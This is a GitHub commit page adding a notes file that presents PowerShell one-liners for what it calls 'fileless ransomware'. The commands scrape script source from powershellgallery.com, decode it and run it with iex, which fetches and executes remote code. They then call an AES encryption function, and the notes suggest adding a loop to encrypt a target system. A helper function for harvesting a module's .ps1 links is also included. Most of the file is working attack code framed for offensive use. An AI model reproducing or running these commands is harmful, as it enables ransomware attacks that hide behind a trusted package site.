Skip to content

Commit 434d715

Browse files
I-Am-JakobyI-Am-Jakoby
authored
Create cGpt.txt
1 parent de898e0 commit 434d715

File tree

1 file changed

+59
-0
lines changed

1 file changed

+59
-0
lines changed

VideoNotes/cGpt.txt

Lines changed: 59 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,59 @@
1+
# powerGallery
2+
3+
This one liner will load the neccessary files to encrypt a system straight from the trusted powershellgallery.com website.
4+
Used in conjunction with a simple for loop its is now fileless ransomware hosted and executed from your platform
5+
6+
```powershell
7+
([regex]::Matches((irm "https://www.powershellgallery.com/packages/PSAES/1.0.0.5/Content/Protect-AESMessage.ps1"),'(?<=<td class="fileContent .*?">).*?(?=<\/td>)','s').Value|%{[System.Net.WebUtility]::HtmlDecode($_)})-replace'<[^>]*>'-replace'^\s*',''-replace '[^\x20-\x7E]'|iex
8+
```
9+
10+
Next its as simple as running the commands stored in that module agaisnt the system
11+
In this instance we can encrypt a string, but why stop there?
12+
13+
```powershell
14+
$encryptedMessage = Protect-AESMessage -Message "Sensitive Data" -Password "89c57yj78754cth8"
15+
```
16+
17+
Combining them into a simple one liner. Together with yet another simple functionality the `for loop` you should be able to see the danger
18+
We could run fileless ransomware on a target computer all from a trusted source
19+
20+
```powershell
21+
([regex]::Matches((irm "https://www.powershellgallery.com/packages/PSAES/1.0.0.5/Content/Protect-AESMessage.ps1"),'(?<=<td class="fileContent .*?">).*?(?=<\/td>)','s').Value|%{[System.Net.WebUtility]::HtmlDecode($_)})-replace'<[^>]*>'-replace'^\s*',''-replace '[^\x20-\x7E]'|iex;$encryptedMessage = Protect-AESMessage -Message "Sensitive Data" -Password "89c57yj78754cth8"
22+
```
23+
24+
You can use this function to grab the links of all the .ps1 files in a module from the powershell gallery website
25+
26+
```powershell
27+
function Get-Ps1Urls {
28+
param ([string]$Url)
29+
try {
30+
$content = Invoke-RestMethod -Uri $Url
31+
$regex = '<a\s+[^>]*href="([^"]+\.ps1)"[^>]*>'
32+
$matches = [regex]::Matches($content, $regex)
33+
$baseURL = "https://www.powershellgallery.com"
34+
$ps1Links = @()
35+
foreach ($match in $matches) {
36+
$relativeLink = $match.Groups[1].Value
37+
$fullLink = $baseURL + $relativeLink
38+
$ps1Links += $fullLink
39+
}
40+
return $ps1Links
41+
}
42+
catch {
43+
Write-Error "An error occurred: $_"
44+
}
45+
}
46+
```
47+
48+
Syntax:
49+
50+
```powershell
51+
$urls = get-Ps1Urls -Url "https://www.powershellgallery.com/packages/PSAES/1.0.0.5"
52+
```
53+
54+
55+
```powershell
56+
$urls = @("https://www.powershellgallery.com/packages/PSAES/1.0.0.5/Content/Protect-AESMessage.ps1")
57+
58+
foreach ($url in $urls){([regex]::Matches((irm "$url"), '(?<=<td class="fileContent .*?">).*?(?=<\/td>)', 's').Value|%{[System.Net.WebUtility]::HtmlDecode($_)})-replace'<(?!#)[^>]+>|(?<!<#)>(?![^#])',''}
59+
```

0 commit comments

Comments
 (0)